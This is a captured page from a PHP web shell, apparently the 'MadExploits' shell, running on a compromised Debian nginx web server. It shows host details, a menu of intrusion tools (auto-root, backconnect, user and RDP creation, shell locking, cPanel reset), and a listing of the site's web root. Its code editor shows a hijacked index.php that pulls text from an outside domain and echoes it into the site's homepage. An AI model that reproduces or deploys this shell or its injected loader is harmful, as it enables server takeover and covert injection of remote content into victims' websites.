Linux webstaff 6.12.43+deb12-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.12.43-1~bpo12+1 (2025-09-06) x86_64
nginx/1.22.1
: 202.29.57.4 | : 216.73.216.61
Cant Read [ /etc/named.conf ]
8.4.15
web2
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
clients /
client2 /
web2 /
web /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
ethics
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
ris
[ DIR ]
drwxr-xr-x
stats
[ DIR ]
drwxr-xr-x
.mad-root
0
B
-rw-r--r--
cons.html
1.7
KB
-rw-r--r--
ethic.html
5.77
KB
-rw-r--r--
ethic1.html
8.33
KB
-rw-r--r--
ethic2.html
8.72
KB
-rw-r--r--
googlef9bacac76214d925.html
53
B
-rw-r--r--
index.php
1.37
KB
-rw-r--r--
main.html
13.42
KB
-rw-r--r--
main1.html
24.87
KB
-rw-r--r--
main2.html
5.86
KB
-rw-r--r--
main3.html
2.3
KB
-rw-r--r--
robots.txt
66
B
-rw-r--r--
sitemap.xml
425
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : index.php
<?php function getExternalContentCurl($url) { // Validasi URL if (!filter_var($url, FILTER_VALIDATE_URL)) { return "URL tidak valid"; } // Inisialisasi cURL $ch = curl_init(); // Set opsi cURL curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 10); curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36'); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, true); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 2); // Eksekusi $content = curl_exec($ch); // Cek error if (curl_errno($ch)) { $error_msg = curl_error($ch); curl_close($ch); return "cURL Error: " . $error_msg; } // Get HTTP status code $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($http_code != 200) { return "HTTP Error: Status code " . $http_code; } return $content; } // Contoh penggunaan $url = "https://pejuang-dollar.xyz/shutup/sskru.txt"; $content = getExternalContentCurl($url); if (is_string($content) && !str_contains($content, "Error")) { // Hanya menampilkan konten tanpa heading echo $content; } else { echo $content; } ?>
Close